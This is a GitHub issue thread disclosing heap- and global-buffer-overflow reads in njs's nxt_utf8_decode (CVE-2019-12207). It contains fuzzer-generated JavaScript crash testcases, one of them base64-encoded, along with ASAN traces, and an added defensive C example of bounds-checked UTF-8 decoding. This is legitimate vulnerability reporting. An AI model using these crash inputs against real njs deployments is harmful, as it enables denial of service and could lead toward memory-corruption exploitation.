
heap-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72 #168

Closed
wrauner opened this issue May 20, 2019 · 4 comments

@wrauner

commented May 20, 2019

Testcase (in base64):

bmV3IFJlZ0V4cChuZXcgUmVnRXhwKFJlZ0V4cCgobmV3IE9iamVjdCgiADs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7GDtzOzskOzs7OzsiLCAobmV3IEVycm9yKG5ldyBFcnJvcihuZXcgRXJyb3IobmV3IEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKCgwLTApKSkpKSkpKSk8PTApKSswKSkpKQo=

njs version:
changeset: 965:e0fdef4eb478

Stack trace (from ASAN):

==22308==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500000c100 at pc 0x555c148621d9 bp 0x7ffdddc241c0 sp 0x7ffdddc241b0
READ of size 1 at 0x62500000c100 thread T0
    #0 0x555c148621d8 in nxt_utf8_decode nxt/nxt_utf8.c:72
    #1 0x555c14862905 in nxt_utf8_length nxt/nxt_utf8.c:271
    #2 0x555c147b5a06 in njs_regexp_prototype_source njs/njs_regexp.c:674
    #3 0x555c147b5a06 in njs_regexp_constructor njs/njs_regexp.c:131
    #4 0x555c147a9cdb in njs_function_native_call njs/njs_function.c:587
    #5 0x555c146d1d82 in njs_vmcode_function_call njs/njs_vm.c:2061
    #6 0x555c146c7d47 in njs_vmcode_interpreter njs/njs_vm.c:159
    #7 0x555c146c2b83 in njs_vm_start njs/njs.c:594
    #8 0x555c146a5cc3 in njs_process_script njs/njs_shell.c:770
    #9 0x555c1469ef48 in njs_process_file njs/njs_shell.c:619
    #10 0x555c1469ef48 in main njs/njs_shell.c:281
    #11 0x7fcc25e56b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #12 0x555c146a0ef9 in _start (/home/build/njs/build/njs+0x2aef9)

Found by fluff

@jdelta-RBS


commented May 20, 2019

This issue was assigned CVE-2019-12207

@wrauner

Author

commented Jun 20, 2019

We found another crash in the same function with a similar backtrace. @xeioex, should we open a new issue or reopen this one?

NJS version:

changeset:   1011:2fb43ddbce84
tag:         tip
user:        hongzhidao <hongzhidao@gmail.com>
date:        Mon Jun 10 22:23:56 2019 -0400
summary:     Added property getter/setter support in Object.defineProperty().

JS Testcase:

(new InternalError(new Object(), RegExp().source.replace((Object((ReferenceError()+{get: function () {
}}))||Object.isExtensible()), RegExp().source.replace((RegExp()||ignoreCase.startsWith()), function v0() {
}, Number(), Boolean(), Error(), TypeError(), Boolean(), Error(), Object(), 0)))+0)

ASAN log:

=================================================================
==3788==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5566629c2ab8 at pc 0x55666274915c bp 0x7ffefaee9990 sp 0x7ffefaee9980
READ of size 1 at 0x5566629c2ab8 thread T0
    #0 0x55666274915b in nxt_utf8_decode nxt/nxt_utf8.c:72
    #1 0x556662749796 in nxt_utf8_length nxt/nxt_utf8.c:271
    #2 0x5566625d3857 in njs_string_replace_join njs/njs_string.c:3661
    #3 0x5566625e40ee in njs_string_replace_regexp_join njs/njs_string.c:3280
    #4 0x5566625e40ee in njs_string_replace_regexp njs/njs_string.c:3163
    #5 0x5566625e40ee in njs_string_prototype_replace njs/njs_string.c:3058
    #6 0x55666268dc13 in njs_function_native_call njs/njs_function.c:587
    #7 0x5566625b0592 in njs_vmcode_continuation njs/njs_vm.c:2336
    #8 0x5566625b0cb3 in njs_vmcode_interpreter njs/njs_vm.c:159
    #9 0x5566625ab693 in njs_vm_start njs/njs.c:594
    #10 0x55666258e8a9 in njs_process_script njs/njs_shell.c:772
    #11 0x556662587cc8 in njs_process_file njs/njs_shell.c:621
    #12 0x556662587cc8 in main njs/njs_shell.c:283
    #13 0x7f67abf81b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #14 0x556662589db9 in _start (/home/build/njs/build/njs+0x2bdb9)

0x5566629c2ab8 is located 40 bytes to the left of global variable '__compound_literal.29' defined in 'njs/njs_object.c:2284:18' (0x5566629c2ae0) of size 56
0x5566629c2ab8 is located 0 bytes to the right of global variable '__compound_literal.30' defined in 'njs/njs_object.c:2292:18' (0x5566629c2a80) of size 56
SUMMARY: AddressSanitizer: global-buffer-overflow nxt/nxt_utf8.c:72 in nxt_utf8_decode
Shadow bytes around the buggy address:
  0x0aad4c530500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aad4c530510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0aad4c530520: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
  0x0aad4c530530: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9
  0x0aad4c530540: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
=>0x0aad4c530550: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 00 00 00 00
  0x0aad4c530560: 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530570: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530580: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c530590: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
  0x0aad4c5305a0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3788==ABORTING
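Added note, not part of the original thread: both ASAN reports above place the out-of-bounds READ of size 1 in nxt_utf8_decode while nxt_utf8_length is walking a string, and the second report locates the address 0 bytes to the right of a global, i.e. one byte past the end of the buffer being decoded. The C below is an added example (not njs code, and not the fix the maintainers applied) of the defensive pattern for that bug class: a decoder that is handed an explicit end pointer and verifies that every continuation byte lies inside the buffer before reading it, so a multibyte sequence truncated at the end of the buffer is reported as invalid rather than completed from adjacent memory. The names utf8_decode_bounded, utf8_length_bounded and UTF8_INVALID and all sample inputs are constructed for this example; the thread does not establish that a missing length check is exactly what happened inside nxt_utf8_decode, so that reading of the trace is an assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not njs code.  A UTF-8 decoder that never reads at or
 * beyond `end`.  Function and constant names are hypothetical.
 */

#define UTF8_INVALID 0xFFFFFFFFu   /* malformed or truncated sequence */

/*
 * Decode one code point from [*start, end).  On success, advance *start
 * past the sequence and return the code point; otherwise return
 * UTF8_INVALID and leave *start untouched.
 */
uint32_t utf8_decode_bounded(const unsigned char **start, const unsigned char *end)
{
    const unsigned char *p = *start;
    uint32_t cp = 0;
    size_t need = 0;             /* continuation bytes expected after the lead */

    if (p >= end) {
        return UTF8_INVALID;     /* empty range: nothing to read */
    }

    unsigned char lead = p[0];

    if (lead < 0x80) {
        *start = p + 1;
        return lead;             /* ASCII, including an embedded 0x00 byte */
    } else if ((lead & 0xE0) == 0xC0) {
        if (lead < 0xC2) {
            return UTF8_INVALID; /* 0xC0 and 0xC1 are always overlong */
        }
        cp = lead & 0x1F;
        need = 1;
    } else if ((lead & 0xF0) == 0xE0) {
        cp = lead & 0x0F;
        need = 2;
    } else if ((lead & 0xF8) == 0xF0) {
        if (lead > 0xF4) {
            return UTF8_INVALID; /* would encode above U+10FFFF */
        }
        cp = lead & 0x07;
        need = 3;
    } else {
        return UTF8_INVALID;     /* stray continuation byte or 0xF8..0xFF */
    }

    /*
     * Bounds check before touching any continuation byte.  A sequence cut
     * off at the end of the buffer is rejected here instead of being read
     * to completion from whatever memory follows `end`.
     */
    if ((size_t)(end - p) < need + 1) {
        return UTF8_INVALID;
    }

    for (size_t i = 1; i <= need; i++) {
        if ((p[i] & 0xC0) != 0x80) {
            return UTF8_INVALID; /* continuation bytes must be 10xxxxxx */
        }
        cp = (cp << 6) | (p[i] & 0x3F);
    }

    /* Reject overlong 3- and 4-byte forms, UTF-16 surrogates and > U+10FFFF. */
    if ((need == 2 && cp < 0x800) || (need == 3 && cp < 0x10000)
        || (cp >= 0xD800 && cp <= 0xDFFF) || cp > 0x10FFFF) {
        return UTF8_INVALID;
    }

    *start = p + need + 1;
    return cp;
}

/*
 * Count code points in a buffer of explicit length.  The buffer is not
 * treated as NUL-terminated: an embedded 0x00 is an ordinary character.
 * Returns -1 on the first malformed or truncated sequence.
 */
long utf8_length_bounded(const unsigned char *p, size_t len)
{
    const unsigned char *end = p + len;
    long n = 0;

    while (p < end) {
        if (utf8_decode_bounded(&p, end) == UTF8_INVALID) {
            return -1;
        }
        n++;
    }
    return n;
}

int main(void)
{
    /* Constructed inputs: U+20AC complete, the same sequence cut after two
       bytes (as it would be at the end of a buffer), and an embedded NUL. */
    static const unsigned char full[] = { 0xE2, 0x82, 0xAC };
    static const unsigned char cut[]  = { 0xE2, 0x82 };
    static const unsigned char nul[]  = { 'a', 0x00, 'b' };

    printf("complete  : %ld\n", utf8_length_bounded(full, sizeof full));
    printf("truncated : %ld\n", utf8_length_bounded(cut, sizeof cut));
    printf("with NUL  : %ld\n", utf8_length_bounded(nul, sizeof nul));
    return 0;
}
```

The length walk takes a pointer and a byte count rather than relying on a terminator, which matters for inputs like the first testcase above, whose decoded string contains a 0x00 byte in the middle; a NUL-terminated view and a length-based view of such a string disagree about where it ends.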
@xeioex

Contributor

commented Jun 20, 2019

@wrauner please create a separate issue

@wrauner

Author

commented Jun 20, 2019

@xeioex tried the patch that you mentioned earlier and it still crashed, created a new issue #183
